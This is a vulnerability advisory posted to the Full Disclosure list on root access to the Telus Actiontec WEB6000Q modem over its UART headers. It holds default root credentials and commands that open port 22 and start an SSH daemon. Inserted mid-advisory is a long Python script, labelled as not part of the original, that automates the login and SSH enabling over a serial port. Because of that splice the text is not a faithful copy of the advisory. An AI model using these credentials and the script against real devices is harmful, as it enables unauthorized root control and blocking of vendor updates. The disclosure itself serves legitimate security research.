Message-ID: <10595e7f-fefe-bee1-7670-823896cabe93@aklaus.ca>
Date: Sun, 9 Jun 2019 12:27:39 -0600
From: Andrew Klaus <andrew@...aus.ca>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2018-15555 / 15556] Telus Actiontec WEB6000Q Local Privilege Escalation
### Device Details
Discovered By: Andrew Klaus (andrew@...aus.ca)
Vendor: Actiontec (Telus Branded)
Model: WEB6000Q
Affected Firmware: 1.1.02.22
Reported: July 2018
CVE: CVE-2018-15555 (Main OS)
CVE: CVE-2018-15556 (Quantenna OS)
### Summary of Findings
Both the “main” and the “quantenna” OS have a UART header on the motherboard,
and each header provides full shell and bootloader access.
The main OS accepts the credentials user: root, pass: admin; the quantenna
environment accepts user: root with an empty password.
I used a Raspberry Pi to interface with the UART header, but there are
USB UART adapters to do the same thing.
Once root access is obtained, TR-069 Updating can be fully disabled,
preventing the vendor from pushing updates to the device.
### Proof of Concept
Connecting a Raspberry Pi's UART GPIO header to either UART header on the
modem gives a login prompt: root/admin on the main OS header, root/(no
password) on the quantenna header.
### Enabling SSH daemon on Main OS
After retrieving a root shell on the main OS over UART, SSH can be enabled
from that shell with the following (the # lines run on the device, the $
line on a host on the LAN side):

# cli -s Device.X_ACTIONTEC_COM_RemoteLogin.Enable int 1
# iptables -A INPUT -p tcp --dport 22 -j ACCEPT
# dropbear -p 22 -I 1800 &

$ ssh 192.168.1.2 -l admin -oKexAlgorithms=+diffie-hellman-group1-sha1
admin@....168.1.2's password:
BusyBox v1.17.2 (2016-02-03 21:34:18 PST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#

The -oKexAlgorithms option is needed because this dropbear build only offers
diffie-hellman-group1-sha1, which current OpenSSH clients disable by default.
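One way to automate the two steps above (the UART login from the proof of concept, then the SSH-enabling commands), as an added example that is not part of the original advisory: a small state machine answers the login and password prompts, a driver sends the advisory's three commands at the resulting # prompt, and a check of `netstat -tln` confirms a listener on TCP 22. It assumes pyserial for the port, 115200 8N1 on /dev/ttyUSB0 (the advisory gives no baud rate), the BusyBox # prompt shown in the session above, and a constructed console transcript for the offline run; the credentials and commands are the ones the advisory reports.

```python
import re

# Credentials from the advisory: main OS root/admin, Quantenna root with empty password.
CREDENTIALS = {"main": ("root", "admin"), "quantenna": ("root", "")}

# The advisory's "Enabling SSH daemon on Main OS" commands, verbatim.
ENABLE_SSH_CMDS = [
    "cli -s Device.X_ACTIONTEC_COM_RemoteLogin.Enable int 1",
    "iptables -A INPUT -p tcp --dport 22 -j ACCEPT",
    "dropbear -p 22 -I 1800 &",
]

PROMPT_RE = re.compile(r"(^|[\r\n])[#$] ?$")          # ash prompt at end of buffer
LISTEN_RE = re.compile(r"^tcp\s+\d+\s+\d+\s+\S+:(\d+)\s+\S+\s+LISTEN", re.M)


class UartLogin:
    """State machine: feed console text in, get the next line to send back."""

    def __init__(self, user, password):
        self.user, self.password, self.buf = user, password, ""
        self.state = "wait_login"        # -> wait_password -> shell | failed

    def feed(self, chunk):
        self.buf += chunk.decode("latin-1") if isinstance(chunk, bytes) else chunk
        window = self.buf[-256:]
        tail = window.rstrip()
        if "Login incorrect" in window:
            self.state = "failed"
        elif PROMPT_RE.search(window):
            self.state = "shell"         # already a shell, or no Password: for an empty password
        elif self.state == "wait_login" and tail.endswith("login:"):
            self.state, self.buf = "wait_password", ""
            return self.user + "\n"
        elif self.state == "wait_password" and tail.endswith("assword:"):
            self.buf = ""
            return self.password + "\n"
        return None


def ssh_listening(netstat_output, port=22):
    """True if `netstat -tln` output shows a TCP listener on `port`."""
    return any(int(p) == port for p in LISTEN_RE.findall(netstat_output))


def login(console, user, password, max_reads=200):
    """Log in over `console` (read(n)/write(b), e.g. serial.Serial); True on a shell."""
    sm = UartLogin(user, password)
    console.write(b"\n")                 # nudge getty into reprinting the prompt
    for _ in range(max_reads):
        chunk = console.read(256)
        if chunk:
            reply = sm.feed(chunk)
            if reply is not None:
                console.write(reply.encode())
        if sm.state in ("shell", "failed"):
            break
    return sm.state == "shell"


def run_commands(console, commands, max_reads=200):
    """Send each command at the prompt; return each command's output text."""
    outputs = []
    for cmd in commands:
        console.write((cmd + "\n").encode())
        buf = ""
        for _ in range(max_reads):
            chunk = console.read(256)
            buf += chunk.decode("latin-1")
            if chunk and PROMPT_RE.search(buf[-256:]):
                break
        outputs.append(buf)
    return outputs


def enable_ssh(console):
    """Main-OS root shell -> the advisory's three commands -> verify the listener."""
    if not login(console, *CREDENTIALS["main"]):
        raise RuntimeError("no root shell over UART")
    run_commands(console, ENABLE_SSH_CMDS)
    return ssh_listening(run_commands(console, ["netstat -tln"])[0])


def enable_ssh_serial(device="/dev/ttyUSB0", baud=115200):
    """Real run: device path and baud are assumptions, not from the advisory."""
    import serial                        # pyserial; imported lazily so the rest runs without it
    with serial.Serial(device, baud, timeout=1) as console:
        return enable_ssh(console)


class ScriptedConsole:
    """Offline stand-in for serial.Serial: each write releases the next scripted chunk."""

    def __init__(self, chunks):
        self.chunks, self.sent, self.served = list(chunks), [], 0

    def write(self, data):
        self.sent.append(data)

    def read(self, n):
        if self.served < len(self.sent) and self.served < len(self.chunks):
            self.served += 1
            return self.chunks[self.served - 1]
        return b""


# Constructed main-OS transcript (not a capture): banner text follows the advisory's session.
MAIN_TRANSCRIPT = [
    b"WEB6000Q login: ",
    b"Password: ",
    b"\r\nBusyBox v1.17.2 (2016-02-03 21:34:18 PST) built-in shell (ash)\r\n"
    b"Enter 'help' for a list of built-in commands.\r\n# ",
    b"# ", b"# ", b"# ",
    b"netstat -tln\r\nProto Recv-Q Send-Q Local Address           Foreign Address         State\r\n"
    b"tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN\r\n"
    b"tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN\r\n# ",
]

if __name__ == "__main__":
    console = ScriptedConsole(MAIN_TRANSCRIPT)
    print("ssh listening:", enable_ssh(console))
```

Run with `python3 web6000q_uart.py` to replay the constructed transcript; `enable_ssh_serial()` does the same against a real port. The login state machine treats an immediate # prompt as success so that the quantenna case (root, empty password, possibly no Password: prompt at all) and a console left logged in are both handled, and it stops on "Login incorrect" rather than retrying blindly.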
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/